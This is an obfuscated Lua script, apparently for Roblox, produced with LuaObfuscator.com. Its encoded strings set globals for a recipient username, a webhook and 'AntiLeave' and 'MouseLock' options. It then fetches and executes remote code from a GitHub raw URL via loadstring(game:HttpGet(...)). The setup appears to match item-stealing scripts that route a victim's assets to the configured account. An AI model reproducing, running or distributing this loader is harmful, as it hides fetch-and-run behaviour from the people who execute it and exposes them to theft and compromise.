--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -(877 -(282 + 595)))) -(v32-(2 -1))) + 1)) ;return v82-(v82%((98 + 522) -(555 + 64))) ;else local v83=(933 -(857 + (1711 -(1523 + 114))))^(v32-(569 -(367 + 201))) ;return (((v31%(v83 + v83))>=v83) and (928 -(214 + 713))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 + (0 -0) );v19=v19 + (5 -1) ;return (v37 * (16778281 -(68 + 997))) + (v36 * (66806 -(226 + 1044))) + (v35 * (373 -(32 + 85))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38==(0 -0)) then v39=0 + 0 ;v40=nil;v38=1 -0 ;end if (v38==(4 + 0)) then while true do if (v39~=(1474 -(1329 + 145))) then else local v96=971 -(140 + 831) ;while true do if (v96~=1) then else v39=1851 -(1409 + 441) ;break;end if (v96==0) then v40=718 -(15 + 703) ;v41=nil;v96=1 + 0 ;end end end if (v39==(439 -(262 + 176))) then v42=nil;v43=nil;v39=2;end if (2==v39) then v44=nil;v45=nil;v39=3;end if (v39==(1724 -(345 + 1376))) then v46=nil;while true do if (v40==0) then local v97=0;while true do if (v97~=(689 -(198 + 490))) then else v43={};v40=1;break;end if (v97==0) then v41={};v42={};v97=4 -3 ;end end end if (v40~=3) then else local v98=0;local v99;while true do if ((0 -0)==v98) then v99=1206 -(696 + 510) ;while true do if ((0 -0)==v99) then for v167=1,v24() do v42[v167-(1263 -(1091 + 171)) ]=v29();end return v44;end end break;end end end if (v40~=(1 + 1)) then else local v100=0;local v101;while true do if ((0 -0)==v100) then v101=0 -0 ;while true do if ((374 -(123 + 251))~=v101) then else local v163=0;while true do if ((0 -0)~=v163) then else for v181=1,v45 do local v182=0;local v183;local v184;while true do if (v182==(699 -(208 + 490))) then if (v183==1) then v184=v22()~=(0 + 0) ;elseif (v183==(1 + 1)) then v184=v25();elseif (v183==3) then v184=v26();end v46[v181]=v184;break;end if (v182==(836 -(660 + 176))) then local v187=0 + 0 ;while true do if (v187~=(203 -(14 + 188))) then else v182=676 -(534 + 141) ;break;end if (v187~=(0 + 0)) then else v183=v22();v184=nil;v187=1 + 0 ;end end end end end v44[3 + 0 ]=v22();v163=1 -0 ;end if (v163~=(1 -0)) then else v101=1;break;end end end if (v101==(2 -1)) then for v169=1,v24() do local v170=0 + 0 ;local v171;local v172;while true do if (v170~=1) then else while true do if (v171==(0 + 0)) then v172=v22();if (v21(v172,1,1)~=0) then else local v188=0;local v189;local v190;local v191;local v192;local v193;while true do if (2==v188) then v193=nil;while true do if (v189==(398 -(115 + 281))) then while true do if (v190~=(2 -1)) then else local v196=0 + 0 ;local v197;while true do if (v196==0) then v197=0 -0 ;while true do if (v197==1) then v190=7 -5 ;break;end if (v197~=0) then else local v205=867 -(550 + 317) ;local v206;while true do if (v205==0) then v206=0;while true do if (v206==(1 -0)) then v197=1;break;end if (v206==0) then v193={v23(),v23(),nil,nil};if (v191==0) then local v211=285 -(134 + 151) ;while true do if (v211~=(1665 -(970 + 695))) then else v193[3]=v23();v193[7 -3 ]=v23();break;end end elseif (v191==1) then v193[1993 -(582 + 1408) ]=v24();elseif (v191==(6 -4)) then v193[3]=v24() -(2^(19 -3)) ;elseif (v191~=3) then else local v220=0 -0 ;local v221;while true do if (v220~=0) then else v221=1824 -(1195 + 629) ;while true do if (v221==0) then v193[3 -0 ]=v24() -(2^(257 -(187 + 54))) ;v193[4]=v23();break;end end break;end end end v206=781 -(162 + 618) ;end end break;end end end end break;end end end if (v190~=2) then else local v198=0 + 0 ;local v199;while true do if (v198~=(0 + 0)) then else v199=0 -0 ;while true do if (v199==(0 -0)) then local v207=0;local v208;while true do if (0~=v207) then else v208=0 + 0 ;while true do if (v208==1) then v199=1;break;end if (v208==0) then local v210=0;while true do if (v210==1) then v208=1637 -(1373 + 263) ;break;end if (v210~=0) then else if (v21(v192,1,1)==1) then v193[2]=v46[v193[2]];end if (v21(v192,2,2)~=(1001 -(451 + 549))) then else v193[3]=v46[v193[1 + 2 ]];end v210=1 -0 ;end end end end break;end end end if (v199~=1) then else v190=3;break;end end break;end end end if (3~=v190) then else if (v21(v192,4 -1 ,3)==(1385 -(746 + 638))) then v193[2 + 2 ]=v46[v193[4]];end v41[v169]=v193;break;end if (v190~=0) then else local v201=0 -0 ;local v202;while true do if (v201==0) then v202=0;while true do if ((341 -(218 + 123))==v202) then local v209=0;while true do if (v209==(1581 -(1535 + 46))) then v191=v21(v172,2 + 0 ,3);v192=v21(v172,1 + 3 ,6);v209=561 -(306 + 254) ;end if (v209==1) then v202=1 + 0 ;break;end end end if ((1 -0)~=v202) then else v190=1468 -(899 + 568) ;break;end end break;end end end end break;end if (v189~=1) then else local v194=0 + 0 ;while true do if ((2 -1)~=v194) then else v189=2;break;end if ((603 -(268 + 335))~=v194) then else v192=nil;v193=nil;v194=291 -(60 + 230) ;end end end if (v189~=(572 -(426 + 146))) then else local v195=0 + 0 ;while true do if (v195==(1457 -(282 + 1174))) then v189=812 -(569 + 242) ;break;end if (v195==(0 -0)) then v190=0;v191=nil;v195=1 + 0 ;end end end end break;end if (v188~=(1025 -(706 + 318))) then else v191=nil;v192=nil;v188=2;end if (v188~=(1251 -(721 + 530))) then else v189=0;v190=nil;v188=1272 -(945 + 326) ;end end end break;end end break;end if (v170==(0 -0)) then local v185=0;while true do if (v185==(1 + 0)) then v170=1;break;end if (v185~=(700 -(271 + 429))) then else v171=0;v172=nil;v185=1;end end end end end v40=3;break;end end break;end end end if (v40~=1) then else local v102=0 + 0 ;local v103;while true do if (v102~=(1500 -(1408 + 92))) then else v103=0;while true do if (v103~=(1087 -(461 + 625))) then else v46={};v40=1290 -(993 + 295) ;break;end if (v103~=0) then else local v164=0;while true do if (v164==(1 + 0)) then v103=1172 -(418 + 753) ;break;end if (v164~=(0 + 0)) then else v44={v41,v42,nil,v43};v45=v24();v164=1;end end end end break;end end end end break;end end break;end if (v38~=1) then else v41=nil;v42=nil;v38=2;end if (v38~=3) then else v45=nil;v46=nil;v38=2 + 2 ;end if (v38==(1 + 1)) then v43=nil;v44=nil;v38=3;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=530 -(406 + (212 -89)) ;local v50=(v21(v48,(5871 -4101) -(1749 + 20) ,5 + 15 ) * ((1324 -(1017 + 232 + 73))^32)) + v47 ;local v51=v21(v48,8 + 13 ,(171 + 1005) -(466 + 679) );local v52=((v21(v48,76 -(88 -44) )==1) and  -(2 -1)) or ((1966 -(30 + 35)) -(106 + 1794)) ;if (v51==(0 + 0)) then if (v50==(0 + 0)) then return v52 * (0 -0) ;else v51=2 -(1 + 0) ;v49=114 -(4 + 110) ;end elseif (v51==(2631 -(57 + 527))) then return ((v50==(1427 -((1298 -(1043 + 214)) + 1386))) and (v52 * ((104 -(17 + 86))/(0 + 0)))) or (v52 * NaN) ;end return v8(v52,v51-(2281 -1258) ) * (v49 + (v50/((5 -3)^((824 -606) -(122 + 44))))) ;end v26=nil;function v26(v53)local v54=(702 + 510) -(323 + 889) ;local v55;local v56;while true do if (v54==(2 -1)) then v55=v3(v16,v19,(v19 + v53) -1 );v19=v19 + v53 ;v54=2;end if (v54==3) then return v6(v56);end if ((580 -(228 + 133 + 219))==v54) then v55=nil;if  not v53 then v53=v24();if (v53==((1170 -(20 + 830)) -(53 + 267))) then return "";end end v54=1 + 0 + 0 ;end if (v54==(415 -(15 + 398))) then v56={};for v87=983 -(18 + 964) , #v55 do v56[v87]=v2(v1(v3(v55,v87,v87)));end v54=11 -(134 -(116 + 10)) ;end end end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58=0 + 0 ;local v59;local v60;while true do if (v58==(738 -(542 + 196))) then v59,v60=v1(v16,v19,v19 + 2 );v19=v19 + 2 + 0 ;v58=1 + (1551 -(1126 + 425)) ;end if (v58==(1 -0)) then return (v60 * (75 + 181)) + v59 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v84=v2(v0(v61,16));if v20 then local v89=v5(v84,v20);v20=nil;return v89;else return v84;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v85=0,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + 1 ];else v78[v85]=v75[v85 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v86=0;while true do if (v86==0) then v80=v68[v72];v81=v80[1];v86=1;end if (v86==1) then if (v81<=5) then if (v81<=2) then if (v81<=0) then v78[v80[2]]=v80[3];elseif (v81>1) then v78[v80[2]]=v80[3]~=0 ;else local v126=0;local v127;local v128;while true do if (v126==1) then v78[v127 + 1 ]=v128;v78[v127]=v128[v80[4]];break;end if (v126==0) then v127=v80[2];v128=v78[v80[3]];v126=1;end end end elseif (v81<=3) then local v106=v80[2];local v107,v108=v71(v78[v106](v13(v78,v106 + 1 ,v80[3])));v73=(v108 + v106) -1 ;local v109=0;for v122=v106,v73 do v109=v109 + 1 ;v78[v122]=v107[v109];end elseif (v81>4) then v64[v80[3]]=v78[v80[2]];else do return;end end elseif (v81<=8) then if (v81<=6) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v64[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v64[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v64[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]][v80[3]]=v80[4];elseif (v81==7) then local v131=v80[2];v78[v131]=v78[v131](v13(v78,v131 + 1 ,v73));else v78[v80[2]]();end elseif (v81<=9) then local v116=0;local v117;local v118;local v119;local v120;local v121;while true do if (8==v116) then v121=v80[2];v78[v121]=v78[v121](v13(v78,v121 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v116=9;end if (v116==3) then v80=v68[v72];v121=v80[2];v120=v78[v80[3]];v78[v121 + 1 ]=v120;v116=4;end if (v116==0) then v117=nil;v118,v119=nil;v120=nil;v121=nil;v116=1;end if (v116==9) then v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];do return;end break;end if (v116==7) then v117=0;for v165=v121,v73 do local v166=0;while true do if (0==v166) then v117=v117 + 1 ;v78[v165]=v118[v117];break;end end end v72=v72 + 1 ;v80=v68[v72];v116=8;end if (v116==5) then v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v116=6;end if (v116==1) then v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v64[v80[3]];v116=2;end if (6==v116) then v80=v68[v72];v121=v80[2];v118,v119=v71(v78[v121](v13(v78,v121 + 1 ,v80[3])));v73=(v119 + v121) -1 ;v116=7;end if (v116==4) then v78[v121]=v120[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v116=5;end if (v116==2) then v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v64[v80[3]];v72=v72 + 1 ;v116=3;end end elseif (v81==10) then v78[v80[2]][v80[3]]=v80[4];else v78[v80[2]]=v64[v80[3]];end v72=v72 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0E3O0003083O00557365724E616D65030D3O0072617175655F6D617475736B6F03073O00576562682O6F6B03093O00557365724E616D653203113O00326E6420557365724E616D65204865726503023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012063O00023O00124O00013O00124O00023O00124O00033O00124O00053O00124O00043O00124O00063O00304O0007000800124O00063O00304O0009000800120B3O00063O0030093O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);
